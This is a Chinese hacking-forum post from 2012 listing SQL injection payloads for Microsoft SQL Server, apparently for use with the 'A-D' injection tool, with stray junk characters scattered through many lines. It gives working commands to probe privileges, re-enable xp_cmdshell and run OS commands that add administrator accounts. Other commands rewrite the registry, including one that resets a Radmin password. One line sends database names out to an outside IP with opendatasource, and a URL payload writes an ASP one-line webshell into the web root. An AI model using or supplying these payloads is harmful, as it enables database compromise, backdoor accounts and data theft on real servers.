找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1761|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
# K: G! h6 c/ \! {+ Y, C& u$ \, l//看看是什么权限的
8 N& m3 Z1 U+ y6 |/ qand 1=(Select IS_MEMBER('db_owner'))
. N( ?( k& u6 ?: Q/ I! a- FAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--( n/ k; |) i, f! M- F
4 U. n/ x9 `$ W+ N& `: N4 a
//检测是否有读取某数据库的权限2 E8 h5 g7 l5 `6 c( y3 U. b
and 1= (Select HAS_DBACCESS('master'))' I1 q; s- E7 t+ k
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --4 p$ o2 C  W7 ^7 ?

2 e" J& S5 ]* [$ X9 x9 V% \1 R9 S
5 K$ U8 N: N" B2 N( y数字类型
3 Q" x" F( }/ N- k9 Q$ oand char(124)%2Buser%2Bchar(124)=07 ^4 s2 E. p; L5 D) e

$ P6 A3 o; f  l' ~# y  I( A字符类型& a7 I; R8 }, Y/ {0 P
' and char(124)%2Buser%2Bchar(124)=0 and ''='
& }: p+ a, d5 a; \+ q: Y0 L
# ?2 V& ^+ {" J8 {' p$ S搜索类型
4 z8 Y9 o- w4 a: T9 z  y' and char(124)%2Buser%2Bchar(124)=0 and '%'='$ g2 O3 X$ \/ T' T  e0 Q1 V7 ^  H

  t' r$ D* v) ]2 F3 W4 ~爆用户名# u: q1 ]: ^& n1 F; H
and user>0% C2 k1 |6 N# _4 Q# l
' and user>0 and ''='
$ g) a+ x, l( ~, s0 ]0 j/ t( O1 O+ L7 f* ~
检测是否为SA权限
# ?! o0 K$ }- fand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
2 ]4 q$ j/ L! CAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
9 C9 t- Z: G: B# e" `6 j: L) Y  e8 ~) v( }# \/ f
检测是不是MSSQL数据库2 N* w% J$ s( A& k" s3 {& p
and exists (select * from sysobjects);--
8 s0 M7 q9 |; c. |  a
0 Z) j$ C* t0 Z9 U* y检测是否支持多行8 |* Y5 c  w, i' G# ^! Y% b
;declare @d int;--
; J: z! x+ @3 s% @# v) N
: r: y, J8 s- C) C* U, x! \恢复 xp_cmdshell
  J2 }! p& C( ]) ?;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--' G+ g4 l( }/ `9 q. a
" h; U+ C1 @- j

0 n* u/ r* L! r7 \& Wselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') ! P0 \' A8 x& Y

9 q% R- F+ V- w. v//-----------------------
3 B# l8 k4 B( z/ l. }3 b//      执行命令7 Q2 ~% p0 |) R0 r' r  C5 y
//-----------------------
0 F0 _4 S( Z4 P+ [5 w  v/ l1 j* E2 M首先开启沙盘模式:& s! H5 b/ b4 M( }% J) X+ o) U
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1' r) u- W$ M6 G4 R8 }0 M# t

/ ?' y, k& r; o* t2 d! u然后利用jet.oledb执行系统命令7 Z- `8 I2 N- E; L  d1 O1 ^1 r9 ?
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')6 M3 K2 I/ v/ |% B$ d
3 j; a2 P% u0 Z) Q6 T
执行命令+ q- C1 i& P% w3 V& ]' S1 ?
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
+ q4 r5 Z" |  n0 V# W: W, r3 |7 e- h' T7 z! x1 [8 i& p, e
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'4 G5 V# {8 y0 P+ |+ v
0 b4 T6 x+ Z# X+ s
判断xp_cmdshell扩展存储过程是否存在:
: U1 m" E( h5 f, Phttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
" \+ N7 ~7 N& s- Y, t, {5 ?* x1 i# W, N
写注册表, v& U* x% g; @/ f8 j
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
) ^  T& E3 T! ?. K4 b
: L7 K# _' A7 Y* aREG_SZ: p4 W& M' l/ V$ D# [3 u2 K! r+ Q4 E
( J! z1 V& p% o. r1 o5 _2 _3 @
读注册表$ @- Z# j; [5 y
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
* e* `: N. `! y) s
9 Z( I; N) d) D读取目录内容
9 ]4 u, L6 Q! E6 k! z$ ~+ |+ fexec master..xp_dirtree 'c:\winnt\system32\',1,1
; ^; ~3 M& b4 a9 e% [9 p
6 N1 j" Y* X! @  K6 ?; R  @$ y. U5 G/ B# q( ~2 t
数据库备份% H  t+ K- ]/ `
backup database pubs to disk = 'c:\123.bak'$ [3 b# w% ?3 K! U" L  }  @
5 w6 j) j! u! Y. ^$ `
//爆出长度9 \$ m* A) z& g, |5 V& v; d
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
3 `$ g" `# Z& V- ~/ R8 B8 [" K0 C, W) t
4 z1 H8 h' M8 z# u+ t( J2 V

- D0 C' U9 v3 D; L更改sa口令方法:用sql综合利用工具连接后,执行命令:9 b* c) V$ j3 X4 m7 g/ [  X
exec sp_password NULL,'新密码','sa'$ p* K( f3 U  H( M/ {  {8 H
- I5 D: p4 x+ V" d# v/ T1 n# \
添加和删除一个SA权限的用户test:- k3 s1 D1 N# D
exec master.dbo.sp_addlogin test,ptlove( X$ u+ ^6 F) t: z8 y8 O
exec master.dbo.sp_addsrvrolemember test,sysadmin' g( f6 E6 r$ r: M+ I. g% U

, Q6 y- w$ t8 P& `+ c$ K6 e. [删除扩展存储过过程xp_cmdshell的语句:
. b! }( s, t; Gexec sp_dropextendedproc 'xp_cmdshell'
; b! ~0 G" K! Q3 _7 u4 Q% ]
. O- }8 x/ x  U$ G+ m" o, H添加扩展存储过过程, x( v1 G+ }3 L+ H) k" X
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' ) ~# f% z0 c' ?
GRANT exec On xp_proxiedadata TO public 0 p, f# j1 e, w5 y- w7 I$ q

! P9 K, O' @9 n  _6 ^/ y' e9 N/ F" B! A
停掉或激活某个服务。
0 L# f1 C1 ?3 e
. ^) Y, y! B7 Z. p! p6 E1 Hexec master..xp_servicecontrol 'stop','schedule'( H: C5 L6 `* G$ L
exec master..xp_servicecontrol 'start','schedule'/ t; @0 ^) J1 R1 ~
% _0 j9 y  \7 t* c2 a' B
dbo.xp_subdirs! |% X& o" K7 ]$ r0 ^4 O3 g2 M
! `# k5 [2 d+ L7 q3 j. ^  U
只列某个目录下的子目录。+ C- [" u; r# q: Y
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
5 }8 U6 Q8 x0 E: S4 ^) ~: ?& t* D
" m3 c1 h# a$ V+ Gdbo.xp_makecab% }/ d6 n" m5 Z& W! E2 E
8 G1 s, W4 F  {+ @  [, T0 G+ d' U
将目标多个档案压缩到某个目标档案之内。  [$ d& H1 v) ^$ k9 p: ~$ ^2 H
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。4 q. x- U- i" F! _+ W$ Y4 M  N0 X

: k; h% _/ K( d2 e. L) D! N% Q0 y# edbo.xp_makecab
2 k; y5 a  h( S0 A: b'c:\test.cab','mszip',1,
2 R  C1 v( f1 P6 X( W5 t/ C3 ^9 m'C:\Inetpub\wwwroot\SQLInject\login.asp',
" p: u2 e9 S5 y  L" L'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
$ s4 K( m+ t' s/ U/ l. B
8 h. S% p2 T" exp_terminate_process. T' ]# s* v7 K5 a% s
/ ^, @' w5 `: K3 u* U+ L( L
停掉某个执行中的程序,但赋予的参数是 Process ID。  F7 E6 K' V8 r1 {( C5 J0 F
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
$ y+ W2 y5 w2 A' l, o8 }2 x6 y* T0 _  Q, E+ _8 J
xp_terminate_process 2484
; X5 h. N6 K! @8 z& ^, P9 G$ d4 b
0 i( x( l) ]  V& u0 J$ vxp_unpackcab
7 X  ?2 j# d. E6 A
, ^, ]1 U7 U% g; u" l$ H$ U解开压缩档。, l! J5 u. w3 p' m; p
4 [+ }# {. P0 `" t/ s
xp_unpackcab 'c:\test.cab','c:\temp',1
$ t: S- m0 I* X
/ Y& T. x' [% I9 ^  S, \5 |/ N; I
5 P0 x7 q, e! `% _某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
1 ^, B8 q" ?) a  _! j/ {& w4 R" ~0 i1 O9 u+ H4 m, b
create database lcx;5 U. [) R& L8 P* F0 r0 _7 n
Create TABLE ku(name nvarchar(256) null);
8 x" C0 H# s9 U# k# G2 g' O; DCreate TABLE biao(id int NULL,name nvarchar(256) null);( P/ Q; W& ~& a* y. _! B& I0 G% A
% u- d) A8 X- P/ U
//得到数据库名
6 K, z( |; X5 j- ~. e# Ainsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases1 O; J. m* R1 w

, @3 ^; B6 p0 h0 b* E2 _9 D( V2 I+ _5 j" C0 S
//在Master中创建表,看看权限怎样
& x% ~- O" _, ?$ W' jCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--/ L4 [. D/ j  ?. W% Z
$ T; m! h5 e+ f1 y
用 sp_makewebtask直接在web目录里写入一句话马:
+ r8 E4 C, V; J* G# F; D. xhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--1 M6 f7 r8 c- t- f. ^1 U4 `
  I4 W9 {0 J; v9 g6 E- K2 w1 f
//更新表内容0 ~& L( L8 J& v2 ]/ U7 j
Update films SET kind = 'Dramatic' Where id = 123
9 z3 D. T# X! Z' {* F+ `$ X( A+ P. ]2 R) U/ z3 G4 W
//删除内容
) _6 t  Z' H* I3 K9 vdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表